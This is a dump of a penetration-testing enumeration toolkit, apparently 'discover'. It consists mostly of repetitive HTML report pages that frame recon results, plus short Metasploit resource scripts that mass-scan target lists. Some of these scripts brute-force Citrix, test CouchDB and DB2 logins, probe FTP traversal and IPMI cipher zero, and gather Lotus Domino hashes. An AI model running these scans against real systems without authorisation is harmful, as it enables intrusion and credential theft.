59 | 			     <li><a href="../pages/passive-recon.htm">Passive Recon</a></li>
60 | 			</ul>         
61 | 			</li>
62 | 
63 | 			<li><a href="#">Web</a>
64 | 			<ul>
65 | 			     <li><a href="../pages/loadbalancing.htm">Loadbalancing</a></li>
66 | 			     <li><a href="../pages/waf.htm">Web App FW</a></li>
67 | 			     <li><a href="../pages/whatweb.htm">Whatweb</a></li>
68 | 			</ul>         
69 | 			</li>
70 | 		</ul>
71 | 	</div>
72 | </div>
73 | 
74 | <div class="clear"></div>
75 | 
76 | <div class="wrapper">
77 | 	<div class="container_12">
78 | 		<div class="main-content">
79 | 			<h2 class="page-header">Domain: <small class="lg-text">Traceroute</small></h2>
80 | 			<iframe src="../data/traceroute.htm" width="100%"></iframe>
81 | 		</div>
82 | 	</div>
83 | </div>
84 | 
85 | </body>
86 | 
87 | </html>
88 | 
89 | 


--------------------------------------------------------------------------------
/ENUMERATION/discover-master/report/pages/txt.htm:
--------------------------------------------------------------------------------
 1 | <!DOCTYPE html>
 2 | 
 3 | <html>
 4 | 
 5 | <head>
 6 | <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
 7 | <title>Reporting Framework</title>
 8 | <link href='http://fonts.googleapis.com/css?family=Droid+Sans:400,700' rel='stylesheet' type='text/css'>
 9 | <link href="../css/defaults.css" rel="stylesheet" type="text/css" />
10 | <link rel="stylesheet" href="../css/style.css" type="text/css" />
11 | </head>
12 | 
13 | <body>
14 | 
15 | <div class="header nav">
16 | 	<div class="header-wrap container_12">
17 | 		<ul class="navbar">
18 | 			<li><a href="../index.htm">Home</a></li>
19 | 			<li><a href="#">Contacts</a>
20 | 			<ul>
21 |                     <li><a href="../pages/emails.htm">Emails</a></li>
22 | 			     <li><a href="../pages/names.htm">Names</a></li>
23 | 			</ul>         
24 | 			</li>
25 | 			<li><a href="#">DNS</a>
26 | 			<ul>
27 | 			     <li><a href="../pages/black-listed.htm">Black Listed</a></li>
28 | 			     <li><a href="../pages/config.htm">Config</a></li>
29 | 			     <li><a href="../pages/records.htm">Records</a></li>
30 | 			     <li><a href="../pages/subdomains.htm">Subdomains</a></li>
31 | 			     <li><a href="../pages/zonetransfer.htm">Zone Transfer</a></li>
32 | 			</ul>         
33 | 			</li>
34 | 
35 | 			<li><a href="#">Domain</a>
36 | 			<ul>
37 | 			     <li><a href="../pages/hosts.htm">Hosts</a></li>
38 |                     <li><a href="../pages/netcraft.htm">Netcraft</a></li>
39 | 			     <li><a href="../pages/squatting.htm">Squatting</a></li>
40 | 			     <li><a href="../pages/traceroute.htm">Traceroute</a></li>
41 | 			     <li><a href="../pages/whois-domain.htm">Whois Domain</a></li>
42 | 			     <li><a href="../pages/whois-ip.htm">Whois IP</a></li>
43 | 			</ul>         
44 | 			</li>
45 | 
46 | 			<li class="current"><a href="#">Files</a>
47 | 			<ul>
48 | 			     <li><a href="../pages/xls.htm">Excel</a></li>
49 | 			     <li><a href="../pages/pdf.htm">PDF</a></li>
50 | 			     <li><a href="../pages/ppt.htm">PowerPoint</a></li>
51 | 			     <li class="current"><a href="../pages/txt.htm">Text</a></li>
52 | 			     <li><a href="../pages/doc.htm">Word</a></li>
53 | 			</ul>         
54 | 			</li>
55 | 
56 | 			<li><a href="#">Reports</a>
57 | 			<ul>
58 | 			     <li><a href="../pages/active-recon.htm">Active Recon</a></li>
59 | 			     <li><a href="../pages/passive-recon.htm">Passive Recon</a></li>
60 | 			</ul>         
61 | 			</li>
62 | 
63 | 			<li><a href="#">Web</a>
64 | 			<ul>
65 | 			     <li><a href="../pages/loadbalancing.htm">Loadbalancing</a></li>
66 | 			     <li><a href="../pages/waf.htm">Web App FW</a></li>
67 | 			     <li><a href="../pages/whatweb.htm">Whatweb</a></li>
68 | 			</ul>         
69 | 			</li>
70 | 		</ul>
71 | 	</div>
72 | </div>
73 | 
74 | <div class="clear"></div>
75 | 
76 | <div class="wrapper">
77 | 	<div class="container_12">
78 | 		<div class="main-content">
79 | 			<h2 class="page-header">Files: <small class="lg-text">Text</small></h2>
80 | 			<iframe src="../data/txt.htm" width="100%"></iframe>
81 | 		</div>
82 | 	</div>
83 | </div>
84 | 
85 | </body>
86 | 
87 | </html>
88 | 
89 | 


--------------------------------------------------------------------------------
/ENUMERATION/discover-master/report/pages/waf.htm:
--------------------------------------------------------------------------------
 1 | <!DOCTYPE html>
 2 | 
 3 | <html>
 4 | 
 5 | <head>
 6 | <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
 7 | <title>Reporting Framework</title>
 8 | <link href='http://fonts.googleapis.com/css?family=Droid+Sans:400,700' rel='stylesheet' type='text/css'>
 9 | <link href="../css/defaults.css" rel="stylesheet" type="text/css" />
10 | <link rel="stylesheet" href="../css/style.css" type="text/css" />
11 | </head>
12 | 
13 | <body>
14 | 
15 | <div class="header nav">
16 | 	<div class="header-wrap container_12">
17 | 		<ul class="navbar">
18 | 			<li><a href="../index.htm">Home</a></li>
19 | 			<li><a href="#">Contacts</a>
20 | 			<ul>
21 |                     <li><a href="../pages/emails.htm">Emails</a></li>
22 | 			     <li><a href="../pages/names.htm">Names</a></li>
23 | 			</ul>         
24 | 			</li>
25 | 			<li><a href="#">DNS</a>
26 | 			<ul>
27 | 			     <li><a href="../pages/black-listed.htm">Black Listed</a></li>
28 | 			     <li><a href="../pages/config.htm">Config</a></li>
29 | 			     <li><a href="../pages/records.htm">Records</a></li>
30 | 			     <li><a href="../pages/subdomains.htm">Subdomains</a></li>
31 | 			     <li><a href="../pages/zonetransfer.htm">Zone Transfer</a></li>
32 | 			</ul>         
33 | 			</li>
34 | 
35 | 			<li><a href="#">Domain</a>
36 | 			<ul>
37 | 			     <li><a href="../pages/hosts.htm">Hosts</a></li>
38 |                     <li><a href="../pages/netcraft.htm">Netcraft</a></li>
39 | 			     <li><a href="../pages/squatting.htm">Squatting</a></li>
40 | 			     <li><a href="../pages/traceroute.htm">Traceroute</a></li>
41 | 			     <li><a href="../pages/whois-domain.htm">Whois Domain</a></li>
42 | 			     <li><a href="../pages/whois-ip.htm">Whois IP</a></li>
43 | 			</ul>         
44 | 			</li>
45 | 
46 | 			<li><a href="#">Files</a>
47 | 			<ul>
48 | 			     <li><a href="../pages/xls.htm">Excel</a></li>
49 | 			     <li><a href="../pages/pdf.htm">PDF</a></li>
50 | 			     <li><a href="../pages/ppt.htm">PowerPoint</a></li>
51 | 			     <li><a href="../pages/txt.htm">Text</a></li>
52 | 			     <li><a href="../pages/doc.htm">Word</a></li>
53 | 			</ul>         
54 | 			</li>
55 | 
56 | 			<li><a href="#">Reports</a>
57 | 			<ul>
58 | 			     <li><a href="../pages/active-recon.htm">Active Recon</a></li>
59 | 			     <li><a href="../pages/passive-recon.htm">Passive Recon</a></li>
60 | 			</ul>         
61 | 			</li>
62 | 
63 | 			<li class="current"><a href="#">Web</a>
64 | 			<ul>
65 | 			     <li><a href="../pages/loadbalancing.htm">Loadbalancing</a></li>
66 | 			     <li class="current"><a href="../pages/waf.htm">Web App FW</a></li>
67 | 			     <li><a href="../pages/whatweb.htm">Whatweb</a></li>
68 | 			</ul>         
69 | 			</li>
70 | 		</ul>
71 | 	</div>
72 | </div>
73 | 
74 | <div class="clear"></div>
75 | 
76 | <div class="wrapper">
77 | 	<div class="container_12">
78 | 		<div class="main-content">
79 | 			<h2 class="page-header">Domain: <small class="lg-text">Web App FW</small></h2>
80 | 			<iframe src="../data/waf.htm" width="100%"></iframe>
81 | 		</div>
82 | 	</div>
83 | </div>
84 | 
85 | </body>
86 | 
87 | </html>
88 | 
89 | 


--------------------------------------------------------------------------------
/ENUMERATION/discover-master/report/pages/whatweb.htm:
--------------------------------------------------------------------------------
 1 | <!DOCTYPE html>
 2 | 
 3 | <html>
 4 | 
 5 | <head>
 6 | <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
 7 | <title>Reporting Framework</title>
 8 | <link href='http://fonts.googleapis.com/css?family=Droid+Sans:400,700' rel='stylesheet' type='text/css'>
 9 | <link href="../css/defaults.css" rel="stylesheet" type="text/css" />
10 | <link rel="stylesheet" href="../css/style.css" type="text/css" />
11 | </head>
12 | 
13 | <body>
14 | 
15 | <div class="header nav">
16 | 	<div class="header-wrap container_12">
17 | 		<ul class="navbar">
18 | 			<li><a href="../index.htm">Home</a></li>
19 | 			<li><a href="#">Contacts</a>
20 | 			<ul>
21 |                     <li><a href="../pages/emails.htm">Emails</a></li>
22 | 			     <li><a href="../pages/names.htm">Names</a></li>
23 | 			</ul>         
24 | 			</li>
25 | 			<li><a href="#">DNS</a>
26 | 			<ul>
27 | 			     <li><a href="../pages/black-listed.htm">Black Listed</a></li>
28 | 			     <li><a href="../pages/config.htm">Config</a></li>
29 | 			     <li><a href="../pages/records.htm">Records</a></li>
30 | 			     <li><a href="../pages/subdomains.htm">Subdomains</a></li>
31 | 			     <li><a href="../pages/zonetransfer.htm">Zone Transfer</a></li>
32 | 			</ul>         
33 | 			</li>
34 | 
35 | 			<li><a href="#">Domain</a>
36 | 			<ul>
37 | 			     <li><a href="../pages/hosts.htm">Hosts</a></li>
38 |                     <li><a href="../pages/netcraft.htm">Netcraft</a></li>
39 | 			     <li><a href="../pages/squatting.htm">Squatting</a></li>
40 | 			     <li><a href="../pages/traceroute.htm">Traceroute</a></li>
41 | 			     <li><a href="../pages/whois-domain.htm">Whois Domain</a></li>
42 | 			     <li><a href="../pages/whois-ip.htm">Whois IP</a></li>
43 | 			</ul>         
44 | 			</li>
45 | 
46 | 			<li><a href="#">Files</a>
47 | 			<ul>
48 | 			     <li><a href="../pages/xls.htm">Excel</a></li>
49 | 			     <li><a href="../pages/pdf.htm">PDF</a></li>
50 | 			     <li><a href="../pages/ppt.htm">PowerPoint</a></li>
51 | 			     <li><a href="../pages/txt.htm">Text</a></li>
52 | 			     <li><a href="../pages/doc.htm">Word</a></li>
53 | 			</ul>         
54 | 			</li>
55 | 
56 | 			<li><a href="#">Reports</a>
57 | 			<ul>
58 | 			     <li><a href="../pages/active-recon.htm">Active Recon</a></li>
59 | 			     <li><a href="../pages/passive-recon.htm">Passive Recon</a></li>
60 | 			</ul>         
61 | 			</li>
62 | 
63 | 			<li class="current"><a href="#">Web</a>
64 | 			<ul>
65 | 			     <li><a href="../pages/loadbalancing.htm">Loadbalancing</a></li>
66 | 			     <li><a href="../pages/waf.htm">Web App FW</a></li>
67 | 			     <li class="current"><a href="../pages/whatweb.htm">Whatweb</a></li>
68 | 			</ul>         
69 | 			</li>
70 | 		</ul>
71 | 	</div>
72 | </div>
73 | 
74 | <div class="clear"></div>
75 | 
76 | <div class="wrapper">
77 | 	<div class="container_12">
78 | 		<div class="main-content">
79 | 			<h2 class="page-header">Web: <small class="lg-text">Whatweb</small></h2>
80 | 			<iframe src="../data/whatweb.htm" width="100%"></iframe>
81 | 		</div>
82 | 	</div>
83 | </div>
84 | 
85 | </body>
86 | 
87 | </html>
88 | 
89 | 


--------------------------------------------------------------------------------
/ENUMERATION/discover-master/report/pages/whois-domain.htm:
--------------------------------------------------------------------------------
 1 | <!DOCTYPE html>
 2 | 
 3 | <html>
 4 | 
 5 | <head>
 6 | <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
 7 | <title>Reporting Framework</title>
 8 | <link href='http://fonts.googleapis.com/css?family=Droid+Sans:400,700' rel='stylesheet' type='text/css'>
 9 | <link href="../css/defaults.css" rel="stylesheet" type="text/css" />
10 | <link rel="stylesheet" href="../css/style.css" type="text/css" />
11 | </head>
12 | 
13 | <body>
14 | 
15 | <div class="header nav">
16 | 	<div class="header-wrap container_12">
17 | 		<ul class="navbar">
18 | 			<li><a href="../index.htm">Home</a></li>
19 | 			<li><a href="#">Contacts</a>
20 | 			<ul>
21 |                     <li><a href="../pages/emails.htm">Emails</a></li>
22 | 			     <li><a href="../pages/names.htm">Names</a></li>
23 | 			</ul>         
24 | 			</li>
25 | 			<li><a href="#">DNS</a>
26 | 			<ul>
27 | 			     <li><a href="../pages/black-listed.htm">Black Listed</a></li>
28 | 			     <li><a href="../pages/config.htm">Config</a></li>
29 | 			     <li><a href="../pages/records.htm">Records</a></li>
30 | 			     <li><a href="../pages/subdomains.htm">Subdomains</a></li>
31 | 			     <li><a href="../pages/zonetransfer.htm">Zone Transfer</a></li>
32 | 			</ul>         
33 | 			</li>
34 | 
35 | 			<li class="current"><a href="#">Domain</a>
36 | 			<ul>
37 | 			     <li><a href="../pages/hosts.htm">Hosts</a></li>
38 |                     <li><a href="../pages/netcraft.htm">Netcraft</a></li>
39 | 			     <li><a href="../pages/squatting.htm">Squatting</a></li>
40 | 			     <li><a href="../pages/traceroute.htm">Traceroute</a></li>
41 | 			     <li class="current"><a href="../pages/whois-domain.htm">Whois Domain</a></li>
42 | 			     <li><a href="../pages/whois-ip.htm">Whois IP</a></li>
43 | 			</ul>         
44 | 			</li>
45 | 
46 | 			<li><a href="#">Files</a>
47 | 			<ul>
48 | 			     <li><a href="../pages/xls.htm">Excel</a></li>
49 | 			     <li><a href="../pages/pdf.htm">PDF</a></li>
50 | 			     <li><a href="../pages/ppt.htm">PowerPoint</a></li>
51 | 			     <li><a href="../pages/txt.htm">Text</a></li>
52 | 			     <li><a href="../pages/doc.htm">Word</a></li>
53 | 			</ul>         
54 | 			</li>
55 | 
56 | 			<li><a href="#">Reports</a>
57 | 			<ul>
58 | 			     <li><a href="../pages/active-recon.htm">Active Recon</a></li>
59 | 			     <li><a href="../pages/passive-recon.htm">Passive Recon</a></li>
60 | 			</ul>         
61 | 			</li>
62 | 
63 | 			<li><a href="#">Web</a>
64 | 			<ul>
65 | 			     <li><a href="../pages/loadbalancing.htm">Loadbalancing</a></li>
66 | 			     <li><a href="../pages/waf.htm">Web App FW</a></li>
67 | 			     <li><a href="../pages/whatweb.htm">Whatweb</a></li>
68 | 			</ul>         
69 | 			</li>
70 | 		</ul>
71 | 	</div>
72 | </div>
73 | 
74 | <div class="clear"></div>
75 | 
76 | <div class="wrapper">
77 | 	<div class="container_12">
78 | 		<div class="main-content">
79 | 			<h2 class="page-header">Domain: <small class="lg-text">Whois Domain</small></h2>
80 | 			<iframe src="../data/whois-domain.htm" width="100%"></iframe>
81 | 		</div>
82 | 	</div>
83 | </div>
84 | 
85 | </body>
86 | 
87 | </html>
88 | 
89 | 


--------------------------------------------------------------------------------
/ENUMERATION/discover-master/report/pages/whois-ip.htm:
--------------------------------------------------------------------------------
 1 | <!DOCTYPE html>
 2 | 
 3 | <html>
 4 | 
 5 | <head>
 6 | <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
 7 | <title>Reporting Framework</title>
 8 | <link href='http://fonts.googleapis.com/css?family=Droid+Sans:400,700' rel='stylesheet' type='text/css'>
 9 | <link href="../css/defaults.css" rel="stylesheet" type="text/css" />
10 | <link rel="stylesheet" href="../css/style.css" type="text/css" />
11 | </head>
12 | 
13 | <body>
14 | 
15 | <div class="header nav">
16 | 	<div class="header-wrap container_12">
17 | 		<ul class="navbar">
18 | 			<li><a href="../index.htm">Home</a></li>
19 | 			<li><a href="#">Contacts</a>
20 | 			<ul>
21 |                     <li><a href="../pages/emails.htm">Emails</a></li>
22 | 			     <li><a href="../pages/names.htm">Names</a></li>
23 | 			</ul>         
24 | 			</li>
25 | 			<li><a href="#">DNS</a>
26 | 			<ul>
27 | 			     <li><a href="../pages/black-listed.htm">Black Listed</a></li>
28 | 			     <li><a href="../pages/config.htm">Config</a></li>
29 | 			     <li><a href="../pages/records.htm">Records</a></li>
30 | 			     <li><a href="../pages/subdomains.htm">Subdomains</a></li>
31 | 			     <li><a href="../pages/zonetransfer.htm">Zone Transfer</a></li>
32 | 			</ul>         
33 | 			</li>
34 | 
35 | 			<li class="current"><a href="#">Domain</a>
36 | 			<ul>
37 | 			     <li><a href="../pages/hosts.htm">Hosts</a></li>
38 |                     <li><a href="../pages/netcraft.htm">Netcraft</a></li>
39 | 			     <li><a href="../pages/squatting.htm">Squatting</a></li>
40 | 			     <li><a href="../pages/traceroute.htm">Traceroute</a></li>
41 | 			     <li><a href="../pages/whois-domain.htm">Whois Domain</a></li>
42 | 			     <li class="current"><a href="../pages/whois-ip.htm">Whois IP</a></li>
43 | 			</ul>         
44 | 			</li>
45 | 
46 | 			<li><a href="#">Files</a>
47 | 			<ul>
48 | 			     <li><a href="../pages/xls.htm">Excel</a></li>
49 | 			     <li><a href="../pages/pdf.htm">PDF</a></li>
50 | 			     <li><a href="../pages/ppt.htm">PowerPoint</a></li>
51 | 			     <li><a href="../pages/txt.htm">Text</a></li>
52 | 			     <li><a href="../pages/doc.htm">Word</a></li>
53 | 			</ul>         
54 | 			</li>
55 | 
56 | 			<li><a href="#">Reports</a>
57 | 			<ul>
58 | 			     <li><a href="../pages/active-recon.htm">Active Recon</a></li>
59 | 			     <li><a href="../pages/passive-recon.htm">Passive Recon</a></li>
60 | 			</ul>         
61 | 			</li>
62 | 
63 | 			<li><a href="#">Web</a>
64 | 			<ul>
65 | 			     <li><a href="../pages/loadbalancing.htm">Loadbalancing</a></li>
66 | 			     <li><a href="../pages/waf.htm">Web App FW</a></li>
67 | 			     <li><a href="../pages/whatweb.htm">Whatweb</a></li>
68 | 			</ul>         
69 | 			</li>
70 | 		</ul>
71 | 	</div>
72 | </div>
73 | 
74 | <div class="clear"></div>
75 | 
76 | <div class="wrapper">
77 | 	<div class="container_12">
78 | 		<div class="main-content">
79 | 			<h2 class="page-header">Domain: <small class="lg-text">Whois IP</small></h2>
80 | 			<iframe src="../data/whois-ip.htm" width="100%"></iframe>
81 | 		</div>
82 | 	</div>
83 | </div>
84 | 
85 | </body>
86 | 
87 | </html>
88 | 
89 | 


--------------------------------------------------------------------------------
/ENUMERATION/discover-master/report/pages/xls.htm:
--------------------------------------------------------------------------------
 1 | <!DOCTYPE html>
 2 | 
 3 | <html>
 4 | 
 5 | <head>
 6 | <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
 7 | <title>Reporting Framework</title>
 8 | <link href='http://fonts.googleapis.com/css?family=Droid+Sans:400,700' rel='stylesheet' type='text/css'>
 9 | <link href="../css/defaults.css" rel="stylesheet" type="text/css" />
10 | <link rel="stylesheet" href="../css/style.css" type="text/css" />
11 | </head>
12 | 
13 | <body>
14 | 
15 | <div class="header nav">
16 | 	<div class="header-wrap container_12">
17 | 		<ul class="navbar">
18 | 			<li><a href="../index.htm">Home</a></li>
19 | 			<li><a href="#">Contacts</a>
20 | 			<ul>
21 |                     <li><a href="../pages/emails.htm">Emails</a></li>
22 | 			     <li><a href="../pages/names.htm">Names</a></li>
23 | 			</ul>         
24 | 			</li>
25 | 			<li><a href="#">DNS</a>
26 | 			<ul>
27 | 			     <li><a href="../pages/black-listed.htm">Black Listed</a></li>
28 | 			     <li><a href="../pages/config.htm">Config</a></li>
29 | 			     <li><a href="../pages/records.htm">Records</a></li>
30 | 			     <li><a href="../pages/subdomains.htm">Subdomains</a></li>
31 | 			     <li><a href="../pages/zonetransfer.htm">Zone Transfer</a></li>
32 | 			</ul>         
33 | 			</li>
34 | 
35 | 			<li><a href="#">Domain</a>
36 | 			<ul>
37 | 			     <li><a href="../pages/hosts.htm">Hosts</a></li>
38 |                     <li><a href="../pages/netcraft.htm">Netcraft</a></li>
39 | 			     <li><a href="../pages/squatting.htm">Squatting</a></li>
40 | 			     <li><a href="../pages/traceroute.htm">Traceroute</a></li>
41 | 			     <li><a href="../pages/whois-domain.htm">Whois Domain</a></li>
42 | 			     <li><a href="../pages/whois-ip.htm">Whois IP</a></li>
43 | 			</ul>         
44 | 			</li>
45 | 
46 | 			<li class="current"><a href="#">Files</a>
47 | 			<ul>
48 | 			     <li class="current"><a href="../pages/xls.htm">Excel</a></li>
49 | 			     <li><a href="../pages/pdf.htm">PDF</a></li>
50 | 			     <li><a href="../pages/ppt.htm">PowerPoint</a></li>
51 | 			     <li><a href="../pages/txt.htm">Text</a></li>
52 | 			     <li><a href="../pages/doc.htm">Word</a></li>
53 | 			</ul>         
54 | 			</li>
55 | 
56 | 			<li><a href="#">Reports</a>
57 | 			<ul>
58 | 			     <li><a href="../pages/active-recon.htm">Active Recon</a></li>
59 | 			     <li><a href="../pages/passive-recon.htm">Passive Recon</a></li>
60 | 			</ul>         
61 | 			</li>
62 | 
63 | 			<li><a href="#">Web</a>
64 | 			<ul>
65 | 			     <li><a href="../pages/loadbalancing.htm">Loadbalancing</a></li>
66 | 			     <li><a href="../pages/waf.htm">Web App FW</a></li>
67 | 			     <li><a href="../pages/whatweb.htm">Whatweb</a></li>
68 | 			</ul>         
69 | 			</li>
70 | 		</ul>
71 | 	</div>
72 | </div>
73 | 
74 | <div class="clear"></div>
75 | 
76 | <div class="wrapper">
77 | 	<div class="container_12">
78 | 		<div class="main-content">
79 | 			<h2 class="page-header">Files: <small class="lg-text">Excel</small></h2>
80 | 			<iframe src="../data/xls.htm" width="100%"></iframe>
81 | 		</div>
82 | 	</div>
83 | </div>
84 | 
85 | </body>
86 | 
87 | </html>
88 | 
89 | 


--------------------------------------------------------------------------------
/ENUMERATION/discover-master/report/pages/zonetransfer.htm:
--------------------------------------------------------------------------------
 1 | <!DOCTYPE html>
 2 | 
 3 | <html>
 4 | 
 5 | <head>
 6 | <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
 7 | <title>Reporting Framework</title>
 8 | <link href='http://fonts.googleapis.com/css?family=Droid+Sans:400,700' rel='stylesheet' type='text/css'>
 9 | <link href="../css/defaults.css" rel="stylesheet" type="text/css" />
10 | <link rel="stylesheet" href="../css/style.css" type="text/css" />
11 | </head>
12 | 
13 | <body>
14 | 
15 | <div class="header nav">
16 | 	<div class="header-wrap container_12">
17 | 		<ul class="navbar">
18 | 			<li><a href="../index.htm">Home</a></li>
19 | 			<li><a href="#">Contacts</a>
20 | 			<ul>
21 |                     <li><a href="../pages/emails.htm">Emails</a></li>
22 | 			     <li><a href="../pages/names.htm">Names</a></li>
23 | 			</ul>         
24 | 			</li>
25 | 			<li class="current"><a href="#">DNS</a>
26 | 			<ul>
27 | 			     <li><a href="../pages/black-listed.htm">Black Listed</a></li>
28 | 			     <li><a href="../pages/config.htm">Config</a></li>
29 | 			     <li><a href="../pages/records.htm">Records</a></li>
30 | 			     <li><a href="../pages/subdomains.htm">Subdomains</a></li>
31 | 			     <li class="current"><a href="../pages/zonetransfer.htm">Zone Transfer</a></li>
32 | 			</ul>         
33 | 			</li>
34 | 
35 | 			<li><a href="#">Domain</a>
36 | 			<ul>
37 | 			     <li><a href="../pages/hosts.htm">Hosts</a></li>
38 |                     <li><a href="../pages/netcraft.htm">Netcraft</a></li>
39 | 			     <li><a href="../pages/squatting.htm">Squatting</a></li>
40 | 			     <li><a href="../pages/traceroute.htm">Traceroute</a></li>
41 | 			     <li><a href="../pages/whois-domain.htm">Whois Domain</a></li>
42 | 			     <li><a href="../pages/whois-ip.htm">Whois IP</a></li>
43 | 			</ul>         
44 | 			</li>
45 | 
46 | 			<li><a href="#">Files</a>
47 | 			<ul>
48 | 			     <li><a href="../pages/xls.htm">Excel</a></li>
49 | 			     <li><a href="../pages/pdf.htm">PDF</a></li>
50 | 			     <li><a href="../pages/ppt.htm">PowerPoint</a></li>
51 | 			     <li><a href="../pages/txt.htm">Text</a></li>
52 | 			     <li><a href="../pages/doc.htm">Word</a></li>
53 | 			</ul>         
54 | 			</li>
55 | 
56 | 			<li><a href="#">Reports</a>
57 | 			<ul>
58 | 			     <li><a href="../pages/active-recon.htm">Active Recon</a></li>
59 | 			     <li><a href="../pages/passive-recon.htm">Passive Recon</a></li>
60 | 			</ul>         
61 | 			</li>
62 | 
63 | 			<li><a href="#">Web</a>
64 | 			<ul>
65 | 			     <li><a href="../pages/loadbalancing.htm">Loadbalancing</a></li>
66 | 			     <li><a href="../pages/waf.htm">Web App FW</a></li>
67 | 			     <li><a href="../pages/whatweb.htm">Whatweb</a></li>
68 | 			</ul>         
69 | 			</li>
70 | 		</ul>
71 | 	</div>
72 | </div>
73 | 
74 | <div class="clear"></div>
75 | 
76 | <div class="wrapper">
77 | 	<div class="container_12">
78 | 		<div class="main-content">
79 | 			<h2 class="page-header">DNS: <small class="lg-text">Zone Transfer</small></h2>
80 | 			<iframe src="../data/zonetransfer.htm" width="100%"></iframe>
81 | 		</div>
82 | 	</div>
83 | </div>
84 | 
85 | </body>
86 | 
87 | </html>
88 | 
89 | 


--------------------------------------------------------------------------------
/ENUMERATION/discover-master/resource/adobe.rc:
--------------------------------------------------------------------------------
1 | setg RHOSTS file:
2 | setg THREADS 255
3 | setg RPORT 8400
4 | 
5 | use auxiliary/scanner/http/adobe_xml_inject
6 | run
7 | 


--------------------------------------------------------------------------------
/ENUMERATION/discover-master/resource/afp.rc:
--------------------------------------------------------------------------------
1 | setg RHOSTS file:
2 | setg THREADS 255
3 | setg RPORT 548
4 | 
5 | use auxiliary/scanner/afp/afp_server_info
6 | run
7 | 


--------------------------------------------------------------------------------
/ENUMERATION/discover-master/resource/backdoor.rc:
--------------------------------------------------------------------------------
1 | setg RHOSTS file:
2 | setg THREADS 255
3 | setg RPORT 7777
4 | 
5 | use auxiliary/scanner/backdoor/energizer_duo_detect
6 | run
7 | 


--------------------------------------------------------------------------------
/ENUMERATION/discover-master/resource/chargen.rc:
--------------------------------------------------------------------------------
1 | setg RHOSTS file:
2 | setg THREADS 255
3 | setg RPORT 19
4 | 
5 | use auxiliary/scanner/chargen/chargen_probe
6 | run
7 | 


--------------------------------------------------------------------------------
/ENUMERATION/discover-master/resource/citrix.rc:
--------------------------------------------------------------------------------
 1 | setg RHOSTS file:
 2 | setg THREADS 255
 3 | setg RPORT 1604
 4 | 
 5 | use gather/citrix_published_applications
 6 | run
 7 | 
 8 | use gather/citrix_published_bruteforce
 9 | run
10 | 


--------------------------------------------------------------------------------
/ENUMERATION/discover-master/resource/couchdb.rc:
--------------------------------------------------------------------------------
1 | setg RHOSTS file:
2 | setg THREADS 255
3 | setg RPORT 5984
4 | 
5 | use auxiliary/scanner/couchdb/couchdb_login
6 | run
7 | 


--------------------------------------------------------------------------------
/ENUMERATION/discover-master/resource/db2-2.rc:
--------------------------------------------------------------------------------
 1 | setg RHOSTS file:
 2 | setg THREADS 255
 3 | setg RPORT 50000
 4 | 
 5 | use auxiliary/scanner/db2/db2_version
 6 | run
 7 | 
 8 | use auxiliary/scanner/db2/db2_auth
 9 | run
10 | 


--------------------------------------------------------------------------------
/ENUMERATION/discover-master/resource/db2.rc:
--------------------------------------------------------------------------------
1 | setg RHOSTS file:
2 | setg THREADS 255
3 | setg RPORT 523
4 | 
5 | use auxiliary/scanner/db2/discovery
6 | run
7 | 


--------------------------------------------------------------------------------
/ENUMERATION/discover-master/resource/dcerpc.rc:
--------------------------------------------------------------------------------
1 | setg RHOSTS file:
2 | setg THREADS 255
3 | setg RPORT 135
4 | 
5 | use auxiliary/scanner/dcerpc/tcp_dcerpc_auditor
6 | run
7 | 


--------------------------------------------------------------------------------
/ENUMERATION/discover-master/resource/dcerpc2.rc:
--------------------------------------------------------------------------------
1 | setg RHOSTS file:
2 | setg THREADS 255
3 | setg RPORT 5040
4 | 
5 | use auxiliary/scanner/dcerpc/windows_deployment_services
6 | run
7 | 


--------------------------------------------------------------------------------
/ENUMERATION/discover-master/resource/emc.rc:
--------------------------------------------------------------------------------
1 | setg RHOSTS file:
2 | setg THREADS 255
3 | setg RPORT 3000
4 | 
5 | use auxiliary/admin/emc/alphastor_devicemanager
6 | run
7 | 


--------------------------------------------------------------------------------
/ENUMERATION/discover-master/resource/emc2.rc:
--------------------------------------------------------------------------------
1 | setg RHOSTS file:
2 | setg THREADS 255
3 | setg RPORT 3500
4 | 
5 | use auxiliary/admin/emc/alphastor_librarymanager
6 | run
7 | 


--------------------------------------------------------------------------------
/ENUMERATION/discover-master/resource/finger.rc:
--------------------------------------------------------------------------------
1 | setg RHOSTS file:
2 | setg THREADS 255
3 | setg RPORT 79
4 | 
5 | use auxiliary/scanner/finger/finger_users
6 | run
7 | 


--------------------------------------------------------------------------------
/ENUMERATION/discover-master/resource/ftp.rc:
--------------------------------------------------------------------------------
 1 | setg RHOSTS file:
 2 | setg THREADS 255
 3 | setg RPORT 21
 4 | 
 5 | use auxiliary/scanner/ftp/ftp_version
 6 | run
 7 | 
 8 | use auxiliary/scanner/ftp/anonymous
 9 | run
10 | 
11 | use auxiliary/scanner/ftp/titanftp_xcrc_traversal
12 | run
13 | 


--------------------------------------------------------------------------------
/ENUMERATION/discover-master/resource/h323.rc:
--------------------------------------------------------------------------------
1 | setg RHOSTS file:
2 | setg THREADS 255
3 | setg RPORT 1720
4 | 
5 | use auxiliary/scanner/h323/h323_version
6 | run
7 | 


--------------------------------------------------------------------------------
/ENUMERATION/discover-master/resource/http.rc:
--------------------------------------------------------------------------------
 1 | setg DOMAIN
 2 | setg HTTPBL_APIKEY
 3 | setg PATH_SAVE /root
 4 | setg RANGE
 5 | setg RHOST
 6 | setg RHOSTS
 7 | setg SQLMAP_PATH /pentest/database/sqlmap
 8 | setg THREADS 255
 9 | setg VULNCSV
10 | 
11 | ipidseq                  # from ip
12 | 
13 | lotus_domino_hashes      # from lotus
14 | lotus_domino_login       # from lotus
15 | lotus_domino_version     # from lotus
16 | 


--------------------------------------------------------------------------------
/ENUMERATION/discover-master/resource/imap.rc:
--------------------------------------------------------------------------------
1 | setg RHOSTS file:
2 | setg THREADS 255
3 | setg RPORT 143
4 | 
5 | use auxiliary/scanner/imap/imap_version
6 | run
7 | 


--------------------------------------------------------------------------------
/ENUMERATION/discover-master/resource/ipmi.rc:
--------------------------------------------------------------------------------
 1 | setg RHOSTS file:
 2 | setg THREADS 255
 3 | setg RPORT 623
 4 | 
 5 | use auxiliary/scanner/ipmi/ipmi_cipher_zero
 6 | run
 7 | 
